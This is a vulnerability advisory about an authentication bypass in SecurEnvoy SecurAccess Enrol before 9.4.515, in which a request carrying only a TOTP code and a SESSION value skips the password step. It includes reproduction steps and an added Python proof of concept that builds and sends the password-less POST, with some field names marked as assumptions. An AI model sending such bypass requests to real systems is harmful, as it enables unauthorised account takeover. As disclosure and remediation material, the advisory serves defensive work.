Shearwater SecurEnvoy SecurAccess Enrol TOTP Authentication Bypass Vulnerability

Vulnerability

A vulnerability in Shearwater SecurEnvoy SecurAccess Enrol versions prior to 9.4.515 allows an attacker to authenticate without supplying the user's password. The flaw is triggered by sending a six-digit Time-based One-Time Password (TOTP) code in an HTTP POST request that also carries a SESSION parameter: the application does not correctly track which authentication steps have been completed for that session, so the password step is skipped. The flaw is reachable over the internet by an unauthenticated attacker.

Impact

Exploitation of this vulnerability lets an attacker authenticate with only the TOTP factor, reducing the multi-factor login to single-factor authentication. An attacker who reaches the Enrol interface this way can gain unauthorized access to user accounts, take control of the user's two-factor authentication, reset passwords, and access sensitive information or functionality within the application.

Reproduction

To reproduce this vulnerability, send an HTTP POST request to the SecurAccess Enrol application that carries a SESSION parameter, a valid username, and a six-digit TOTP code in the PASSCODE parameter. The application authenticates the user without ever checking the password, so the multi-factor requirement is bypassed. Note that the flaw removes the password check, not the TOTP check: the request must still carry a PASSCODE value the server accepts for that user.
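The request above, assembled in Python, together with a check of whether a reported version falls inside the affected range (before 9.4.515). This is an added example, not SecurEnvoy's code and not part of the original advisory. Only the parameter names SESSION and PASSCODE and the fix version come from the page; the endpoint path (/secenrol/), the username field name (USERNAME), the base URL, and the origin of the SESSION value (assumed to be a session identifier issued earlier in the login flow) are assumptions.

```python
"""
Added example (not SecurEnvoy's code): build the password-less POST described in the
Reproduction section and test a version string against the 9.4.515 fix boundary.
"""
import re
import urllib.parse
import urllib.request

# From the Remediation section: first fixed version.
FIXED_VERSION = (9, 4, 515)

# ASSUMPTIONS, not given on the page: Enrol login endpoint path and username field name.
ASSUMED_ENROL_PATH = "/secenrol/"
ASSUMED_USERNAME_FIELD = "USERNAME"


def parse_version(version: str) -> tuple:
    """'9.4.515' -> (9, 4, 515). Stops at the first non-numeric component."""
    parts = []
    for piece in version.strip().split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def is_affected(version: str) -> bool:
    """True when the reported version is older than 9.4.515."""
    return parse_version(version) < FIXED_VERSION


def build_bypass_body(username: str, totp_code: str, session_id: str) -> str:
    """Form body for the password-less login: SESSION + username + six-digit PASSCODE.
    It deliberately carries no password field; that omission is the bypass."""
    if not re.fullmatch(r"\d{6}", totp_code):
        raise ValueError("PASSCODE must be exactly six digits")
    return urllib.parse.urlencode({
        "SESSION": session_id,                 # assumed: session id from an earlier step
        ASSUMED_USERNAME_FIELD: username,      # assumed field name
        "PASSCODE": totp_code,                 # named on the page
    })


def build_bypass_request(base_url: str, username: str, totp_code: str,
                         session_id: str) -> urllib.request.Request:
    """Assemble the POST without sending it, so it can be inspected or replayed via a proxy."""
    body = build_bypass_body(username, totp_code, session_id).encode()
    return urllib.request.Request(
        url=base_url.rstrip("/") + ASSUMED_ENROL_PATH,
        data=body,
        method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )


def send_bypass_request(req: urllib.request.Request, timeout: float = 10.0) -> int:
    """Send the request and return the HTTP status. Needs network access; use only
    against systems you are authorised to test."""
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status


if __name__ == "__main__":
    print("9.4.514 affected:", is_affected("9.4.514"))
    req = build_bypass_request("https://enrol.example.test", "alice", "123456", "abc123")
    print(req.get_method(), req.full_url)
    print(req.data.decode())
```

The request is built separately from sending so the body can be checked or routed through an intercepting proxy before anything leaves the host; a 6-digit check on PASSCODE mirrors the page's description of the value the endpoint expects.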

Remediation

Update SecurEnvoy SecurAccess Enrol to version 9.4.515 or later, the first version in which the password step is enforced.

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating (Custom Algorithm)

  spread          0.0
  impact          5.0
  exploitability  7.6
  remediation     7.7
  relevance       0.0
  threat          6.4
  urgency         2.9
  incentive       1.7

Our algorithm analyzes dozens of metrics to produce these eight vulnerability categories, which are then combined into the overall risk score.